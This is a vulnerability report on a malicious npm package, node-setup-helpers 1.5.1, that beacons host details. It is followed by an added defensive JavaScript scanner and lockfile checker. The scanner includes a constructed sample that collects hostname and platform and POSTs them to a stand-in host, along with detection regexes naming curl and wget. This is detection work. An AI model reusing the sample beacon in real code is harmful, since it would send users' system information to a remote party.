node-setup-helpers @1.5.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4280
Ecosystem
npm
Summary
The package's lib/trap-core.js combines host enumeration (os.hostname(), os.platform()), filesystem probes (fs.existsSync against multiple paths), child_process invocations (curl and ping are observable in the file), and HTTPS POST calls whose request body includes a 'hostname:' field. That is the canonical shape of a system-information beacon: gather host identity, shell out to OS commands, then exfiltrate the results over HTTPS. Multiple POST sites (lines 385, 411, 466, 548, 549) and repeated child_process imports across the file indicate a deliberate, large surface for collection and outbound transmission rather than incidental utility code. Installing this package places this collector in the dependency graph; any code path that reaches lib/trap-core.js will leak host details and command output to a remote endpoint. The report does not say whether an install script reaches the module, so treat the package's presence in a lockfile as the indicator rather than waiting for runtime evidence of the beacon.
Source: amazon-inspector (626e815912fa24995ad58e18c495b1c6bd70987f9970b6262374f292e3c0d6ed)
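The following is an added example, not code from node-setup-helpers, osv.dev or Amazon Inspector. It turns the indicators the summary lists (os.hostname()/os.platform(), fs.existsSync, child_process calls naming curl or ping, HTTPS requests carrying a hostname field) into a heuristic file scanner that reports which indicators hit on which lines and whether the combination matches the beacon shape, and adds a package-lock.json walk that finds every copy of the affected version, including nested ones. The regex set, the beacon rule, and all sample inputs are assumptions constructed for this example; nothing is contacted over the network.

```javascript
// Added example (not code from node-setup-helpers, osv.dev or Amazon Inspector):
// a heuristic scan for the system-information-beacon shape named in the report,
// plus a lockfile check for the affected package version.
// All sample inputs below are constructed for this example.

// One regex per indicator from the report. Non-global so .test() is stateless.
const INDICATORS = [
  { name: 'host enumeration', re: /\bos\.(hostname|platform|userInfo|networkInterfaces|arch|release)\s*\(/ },
  { name: 'filesystem probe', re: /\bfs\.existsSync\s*\(/ },
  { name: 'child_process import', re: /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  // exec/spawn family called with a command line that names curl, ping or wget
  { name: 'shelling out', re: /\b(exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\([^)]*\b(curl|ping|wget)\b/ },
  { name: 'https request', re: /\bhttps\.(request|get)\s*\(/ },
  { name: 'hostname field', re: /\bhostname\s*:/ },
];

// Scan one source file. Returns which indicators hit, on which 1-based lines,
// and whether the combination matches the beacon shape assumed here:
// host identity collected AND a shell-out path AND an HTTPS request
// carrying a hostname field.
function scanSource(src) {
  const lines = src.split('\n');
  const hits = {};
  for (const ind of INDICATORS) {
    const where = [];
    lines.forEach((line, i) => {
      if (ind.re.test(line)) where.push(i + 1);
    });
    if (where.length) hits[ind.name] = where;
  }
  const beaconShaped =
    'host enumeration' in hits &&
    ('child_process import' in hits || 'shelling out' in hits) &&
    'https request' in hits &&
    'hostname field' in hits;
  return { hits, beaconShaped };
}

// Find every copy of a package in a lockfileVersion 2/3 package-lock.json
// object, including nested copies under other dependencies' node_modules.
// version is optional; when given, only matching versions are returned.
function findPackageInLock(lock, name, version) {
  const found = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const isPkg = path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`);
    if (isPkg && (!version || entry.version === version)) {
      found.push({ path, version: entry.version });
    }
  }
  return found;
}

// Constructed sample with the beacon shape. The endpoint is a reserved
// .invalid name and the text is only scanned, never executed.
const SAMPLE = `const os = require('os');
const fs = require('fs');
const { execSync } = require('child_process');
const https = require('https');
const info = { hostname: os.hostname(), platform: os.platform() };
info.docker = fs.existsSync('/.dockerenv');
info.ip = execSync('curl -s https://example.invalid/ip').toString();
const req = https.request({ method: 'POST', host: 'example.invalid', path: '/c' });
req.end(JSON.stringify(info));
`;

// Constructed benign helper: touches os and fs but neither shells out nor beacons.
const BENIGN = `const os = require('os');
const fs = require('fs');
const isWin = os.platform() === 'win32';
const hasLock = fs.existsSync('package-lock.json');
module.exports = { isWin, hasLock };
`;

// Constructed package-lock.json (lockfileVersion 3) with a direct copy of the
// affected version and an older nested copy under another dependency.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'app', version: '1.0.0' },
    'node_modules/node-setup-helpers': { version: '1.5.1' },
    'node_modules/some-dep/node_modules/node-setup-helpers': { version: '1.4.0' },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(scanSource(SAMPLE), null, 2));
  console.log(JSON.stringify(scanSource(BENIGN), null, 2));
  console.log(findPackageInLock(SAMPLE_LOCK, 'node-setup-helpers', '1.5.1'));
}
```

The scanner is deliberately a triage aid, not a verdict: the benign sample shows that os and fs use alone does not trip it, and the beacon rule requires the collection, shell-out and exfiltration indicators together. Run it over every .js file in node_modules/node-setup-helpers and over the lockfile before deciding whether the package ever reached a build.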